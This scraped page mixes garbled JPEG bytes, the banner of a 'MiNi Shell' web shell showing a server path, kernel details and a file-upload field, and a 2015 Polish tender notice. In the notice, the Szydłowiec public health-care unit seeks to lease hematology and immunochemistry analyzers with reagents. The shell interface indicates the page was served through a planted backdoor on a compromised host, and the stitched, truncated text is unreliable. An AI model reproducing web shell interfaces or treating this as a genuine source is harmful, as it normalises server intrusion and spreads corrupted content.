JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151201/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151201/326070-N-2015.html

<p class="kh_header"><b>Szydłowiec: Dzierżawa aparatu do immunochemii wraz z sukcesywną dostawą odczynników oraz dzierżawa analizatora hematologicznego wraz z sukcesywną dostawą odczynników i materiałów eksploatacyjnych dla Laboratorium Analitycznego Samodzielnego Publicznego Zespołu Zakładów Opieki Zdrowotnej w Szydłowcu</b><br>
<b>Numer ogłoszenia: 326070 - 2015; data zamieszczenia: 01.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej w Szydłowcu , ul. Wschodnia 23, 26-500 Szydłowiec, woj. mazowieckie, tel. 048 6170300, faks 048 6170980.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zoz.szydlowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dzierżawa aparatu do immunochemii wraz z sukcesywną dostawą odczynników oraz dzierżawa analizatora hematologicznego wraz z sukcesywną dostawą odczynników i materiałów eksploatacyjnych dla Laboratorium Analitycznego Samodzielnego Publicznego Zespołu Zakładów Opieki Zdrowotnej w Szydłowcu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest dzierżawa aparatu do immunochemii wraz z sukcesywną dostawą odczynników oraz dzierżawa analizatora hematologicznego wraz z sukcesywną dostawą odczynników i materiałów eksploatacyjnych dla Laboratorium Analitycznego Samodzielnego Publicznego Zespołu Zakładów Opieki Zdrowotnej w Szydłowcu zgodnie z załącznikami numer 6, 6a, 6b do SIWZ.

PRZEDMIOT ZAMÓWIENIA
I.Odczynniki i części eksploatacyjne do wykonania morfologii 5 - DIFF dla 72 000 badań na okres 3 lat.
Załącznik nr 6
Analizator hematologiczny szt. 1
1.Analizator nie starszy niż rok produkcji 2007 r.	
2.Wydajność minimum 80 oznaczeń morfologii  na godzinę (wraz z różnicowaniem).	
3.Różnicowanie krwinek w stanie natywnym (bez dodatkowego barwienia)	
4.Całkowicie zautomatyzowany pomiar 24 parametrów morfologii z różnicowaniem białych krwinek (WBC) na 5 populacji leukocytów, możliwość oznaczania retikulocytów.
5.Wszystkie populacje różnicowania leukocytów oznaczane, nie wyliczane.	
6.Możliwość zdefiniowania różnych zakresów norm w zależności od płci, wieku pacjenta - co najmniej 4.
7.Użycie systemu flag do wskazania obecności:  pałek krwi, niedojrzałych granulocytów, pobudzonych limfocytów, blastów w badanej krwi
8.Sposób podawania próbki - manualny z otwartej probówki, z podajnika system zamknięty.
9.Liniowość pomiaru WBC bez konieczności dodatkowego rozcieńczania 0-250K:ul, 
PLT 0-2 mln:ul, RBC 0-8 K:ul,
10.Zastosowane dwie równoległe i niezależne metody pomiaru leukocytów: optyczna i impedacyjna - jako komplementarne metody stosowane w analizatorze - których wyniki są porównywane - w celu uniknięcia rezultatów nieprawidłowych dla próbek patologicznych.
11.Wykrywanie przez analizator: krwinek czerwonych opornych na lizę (RRBC) - możliwość zastosowania trybu wydłużonego lizowania komórek RRBC oraz erytroblastów.
12.Automatyczne czyszczenie igły pobierającej.
13.Kontrola jakości z zastosowaniem reguł Westgarda z graficzną prezentagą i statystyczną oceną wyników kontroli.
14.Wewnątrzlaboratoryjny program kontroli jakości badań połączony z międzylaboratoryjną, bezpłatną oceną jakości (dostarczanie cyklicznych raportów oceny jakości).
15.Oferent pokryje koszty związane z podłączeniem analizatora do laboratoryjnej sieci informatycznej.
16.Parametry materiałów kontrolnych wczytywane za pomocą kodu paskowego lub dyskietki.
17.Współpraca z siecią komputerową (dwukierunkowo).	
18.Zewnętrzny, kolorowy, min. 15 monitor LCD.	
19.Wyposażenie w UPS podtrzymujący pracę aparatu w przypadku awarii zasilania przez okres min. 0,5 h.
20.Wykonawca zapewni bezpłatny serwis producencki na czas trwania umowy dzierżawy.
21.Wykonawca określi całkowity koszt kontraktu (odczynników, części zamiennych, materiałów eksploatacyjnych, etc.).	
22.Szkolenie pracowników w obsłudze aparatu i interpretacji wyników.
23.Pełna bezpłatna gwarancja na czas trwania dzierżawy obejmująca cały system (bezpłatne okresowe przeglądy serwisowe jeden na rok lub wg zaleceń producenta oraz wszystkie usługi i wymianę wszystkich części zamiennych i zużywalnych).	
24.Czas reakcji serwisu (przyjazd inżyniera serwisowego - podjęta naprawa) - maksimum 24 h od zgłoszenia (w dni robocze), naprawa analizatora max. do 3 dni roboczych.	
25.Instrukcja obsługi analizatora w  języku polskim.	
26.Założenie paszportu technicznego.	
27.Dostawa, instalacja oraz uruchomienie analizatora na koszt Wydzierżawiającego
Uwaga: Nie spełnienie któregokolwiek wymaganego parametru i wymagania opisującego przedmiot zamówienia spowoduje odrzucenie oferty.
Załącznik 6a
1.TSH 3 (1 op. a 60)	240
2.ft3  (1 op. a 60 oznaczeń)	23
3.ft4  (1 op. a 60)	45
4.Antygen HBs (1 op. a 60)	6
5.Ab -HBs  (1op a 60)	5
6.Toxo IgM (1 op a 60)	5
7.Toxo IgG (1 op a 60)	5
8.PSA - Total (1 op a 60)	9
9.PSA - Free (1 op a 60)	6
10.D -Dimery (1 op a 60)	6
11.Cyto IgM (1 op a 30)	5
12.Cyto IgG (1 op a 60)	5
13.Anty TPO (1 op a 30)	5
14.Anty TG (1 op a 30)	5
15.Borelioza IgM (1 op a 60)	5
16.Borelioza IgG (1 op a 60)	5
17.Ab - HCV (1 op a 60)	5
18.H. Pylori (1 op. a 30)	9

Załącznik 6b
Wymagane parametry techniczne
Analizator do immunochemii szt. 1
1. Producent
2. Nazwa i typ
3.Analizator nastołowy wieloparametrowy.	
4.Automatyczna krzywa kalibracyjna - w postaci kodu kreskowego.
5.Rekalibracja nie częściej niż raz na 14 dni.
6.Optymalizacja kosztów oznaczania (jednakowy koszt dla pojedynczego oznaczenia i oznaczeń w serii).	
7.Stała gotowość do pracy aparatu.
8.Aparat nie wymagający codziennej obsługi (używania buforów, płynów płuczących, kalibracji, czyszczenia) - stała gotowość do pracy aparatu.	
9.Wykluczenie możliwości kontaminacji (przeniesienia oznaczonego składnika pomiędzy próbkami) - aparat bezigłowy.	
10.Możliwość jednoczesnego oznaczenia różnych parametrów dla tego samego pacjenta.
11.Pojemność analizatora min. 12 testów.	
12.Kompletne zestawy odczynnikowe zawierające kalibratory i kontrole.	
13.Trwałość odczynników do wykonywania oznaczeń po otwarciu opakowania nie krótsza niż trwałość podana na opakowaniu jako termin ważności.	
14.Oferowany analizator musi być objęty gwarancją i serwisem technicznym przez  36 miesiące.
15.Rok budowy aparatu -  nie starszy niż 2009 rok.	
16.Analizator musi posiadać dopuszczenie do obrotu zgodnie z ustawą z dnia z dnia 20 maja 2010 roku o wyrobach medycznych  (Dz. U. z 2015 roku, poz. 876)..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 38.43.45.80-5, 33.69.65.00-0, 38.43.45.70-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia warunków Wykonawca składa wraz z ofertą oświadczenie o spełnieniu warunków o których mowa w art. 22 i 24 Prawo zamówień publicznych (wzór oświadczenia stanowi zał. nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie uszczegóławia wymagań.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie uszczegóławia wymagań.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie uszczegóławia wymagań.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie uszczegóławia wymagań.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 131e ust. 1 pkt. 2 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin dostawy - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>11.5.	Zamawiający dopuszcza zmianę postanowień umowy w odniesieniu do:
1.Waloryzacja wynagrodzenia:
Strony postanawiają, iż dokonują w formie pisemnego aneksu zmiany wynagrodzenia w wypadku wystąpienia którejkolwiek ze zmian przepisów wskazanych w art. 142 ust. 5 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, tj. zmiany:
a.stawki podatku od towarów i usług,
b.wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę,
c.zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne - jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez wykonawcę.
2.Zmiany wysokości wynagrodzenia obowiązywać będzie od dnia wejścia w życie zmian o których mowa w ust. 1.
3.W wypadku zmiany, o której mowa w ust. 1 lit. a) wartość netto wynagrodzenia Wykonawcy nie zmieni się , a określona w aneksie wartość brutto wynagrodzenia zostanie wyliczona na podstawie nowych przepisów.
4.W przypadku zmiany, o której mowa w ust. 1 lit b) wynagrodzenie Wykonawcy ulegnie zmianie o wartość wzrostu całkowitego kosztu Wykonawcy wynikającą ze zwiększenia wynagrodzeń osób bezpośrednio wykonujących zamówienie                do wysokości zmienionego minimalnego wynagrodzenia, z uwzględnieniem wszystkich obciążeń publicznoprawnych od kwoty wzrostu minimalnego wynagrodzenia.
5.	W przypadku zmiany, o której mowa w ust. 1 lit c) wynagrodzenie Wykonawcy ulegnie zmianie o wartość wzrostu całkowitego kosztu Wykonawcy, jaką będzie on zobowiązany dodatkowo ponieść w celu uwzględnienia tej zmiany, przy zachowaniu dotychczasowej kwoty netto wynagrodzenia osób bezpośrednio wykonujących zamówienie na rzecz Zamawiającego.
6.W przypadku, gdy Dostawca zamierzał będzie dokonać podwyżki cen obowiązany jest zawiadomić o tym Odbiorcę na piśmie i określić nowe kalkulację.
7.Odbiorca obowiązany jest udzielić odpowiedzi Dostawcy na piśmie w terminie          14 dni od daty otrzymania propozycji nowych cen i nowe ceny będą miały zastosowanie tylko w przypadku, gdy Odbiorca wyrazi na nie zgodę. W przypadku braku zgody lub nieudzielania odpowiedzi przez Odbiorcę umowa ulegnie rozwiązaniu z upływem ostatniego dnia terminu 30- dniowego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zoz.szydlowiec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Inwestycyjno - Gospodarczy i Transportu Medycznego, ul. Staszica 4,              26 - 500 Szydłowiec, tel./fax.: (048) 617 - 14 - 31..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.12.2015 godzina 10:00, miejsce: Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej w Szydłowcu, ul. Wschodnia 23 w sekretariacie, pok. nr 57..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dzierżawa analizatora hematologicznego wraz z sukcesywną dostawą odczynników i materiałów eksploatacyjnych dla Laboratorium Analitycznego Samodzielnego Publicznego Zespołu Zakładów Opieki Zdrowotnej w Szydłowcu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.Odczynniki i części eksploatacyjne do wykonania morfologii 5 - DIFF dla 72 000 badań na okres 3 lat.
PRZEDMIOT ZAMÓWIENIA
Załącznik nr 6
Analizator hematologiczny szt. 1
1.Analizator nie starszy niż rok produkcji 2007 r.	
2.Wydajność minimum 80 oznaczeń morfologii  na godzinę (wraz z różnicowaniem).	
3.Różnicowanie krwinek w stanie natywnym (bez dodatkowego barwienia)	
4.Całkowicie zautomatyzowany pomiar 24 parametrów morfologii z różnicowaniem białych krwinek (WBC) na 5 populacji leukocytów, możliwość oznaczania retikulocytów.
5.Wszystkie populacje różnicowania leukocytów oznaczane, nie wyliczane.	
6.Możliwość zdefiniowania różnych zakresów norm w zależności od płci, wieku pacjenta - co najmniej 4.
7.Użycie systemu flag do wskazania obecności:  pałek krwi, niedojrzałych granulocytów, pobudzonych limfocytów, blastów w badanej krwi
8.Sposób podawania próbki - manualny z otwartej probówki, z podajnika system zamknięty.
9.Liniowość pomiaru WBC bez konieczności dodatkowego rozcieńczania 0-250K:ul, 
PLT 0-2 mln:ul, RBC 0-8 K:ul,
10.Zastosowane dwie równoległe i niezależne metody pomiaru leukocytów: optyczna i impedacyjna - jako komplementarne metody stosowane w analizatorze - których wyniki są porównywane - w celu uniknięcia rezultatów nieprawidłowych dla próbek patologicznych.
11.Wykrywanie przez analizator: krwinek czerwonych opornych na lizę (RRBC) - możliwość zastosowania trybu wydłużonego lizowania komórek RRBC oraz erytroblastów.
12.Automatyczne czyszczenie igły pobierającej.
13.Kontrola jakości z zastosowaniem reguł Westgarda z graficzną prezentagą i statystyczną oceną wyników kontroli.
14.Wewnątrzlaboratoryjny program kontroli jakości badań połączony z międzylaboratoryjną, bezpłatną oceną jakości (dostarczanie cyklicznych raportów oceny jakości).
15.Oferent pokryje koszty związane z podłączeniem analizatora do laboratoryjnej sieci informatycznej.
16.Parametry materiałów kontrolnych wczytywane za pomocą kodu paskowego lub dyskietki.
17.Współpraca z siecią komputerową (dwukierunkowo).	
18.Zewnętrzny, kolorowy, min. 15 monitor LCD.	
19.Wyposażenie w UPS podtrzymujący pracę aparatu w przypadku awarii zasilania przez okres min. 0,5 h.
20.Wykonawca zapewni bezpłatny serwis producencki na czas trwania umowy dzierżawy.
21.Wykonawca określi całkowity koszt kontraktu (odczynników, części zamiennych, materiałów eksploatacyjnych, etc.).	
22.Szkolenie pracowników w obsłudze aparatu i interpretacji wyników.
23.Pełna bezpłatna gwarancja na czas trwania dzierżawy obejmująca cały system (bezpłatne okresowe przeglądy serwisowe jeden na rok lub wg zaleceń producenta oraz wszystkie usługi i wymianę wszystkich części zamiennych i zużywalnych).	
24.Czas reakcji serwisu (przyjazd inżyniera serwisowego - podjęta naprawa) - maksimum 24 h od zgłoszenia (w dni robocze), naprawa analizatora max. do 3 dni roboczych.	
25.Instrukcja obsługi analizatora w  języku polskim.	
26.Założenie paszportu technicznego.	
27.Dostawa, instalacja oraz uruchomienie analizatora na koszt Wydzierżawiającego
Uwaga: Nie spełnienie któregokolwiek wymaganego parametru i wymagania opisującego przedmiot zamówienia spowoduje odrzucenie oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.45.70-2, 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dzierżawa aparatu do immunochemii wraz z sukcesywną dostawą odczynników.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Załącznik 6a
1.TSH 3 (1 op. a 60)	240
2.ft3  (1 op. a 60 oznaczeń)	23
3.ft4  (1 op. a 60)	45
4.Antygen HBs (1 op. a 60)	6
5.Ab -HBs  (1op a 60)	5
6.Toxo IgM (1 op a 60)	5
7.Toxo IgG (1 op a 60)	5
8.PSA - Total (1 op a 60)	9
9.PSA - Free (1 op a 60)	6
10.D -Dimery (1 op a 60)	6
11.Cyto IgM (1 op a 30)	5
12.Cyto IgG (1 op a 60)	5
13.Anty TPO (1 op a 30)	5
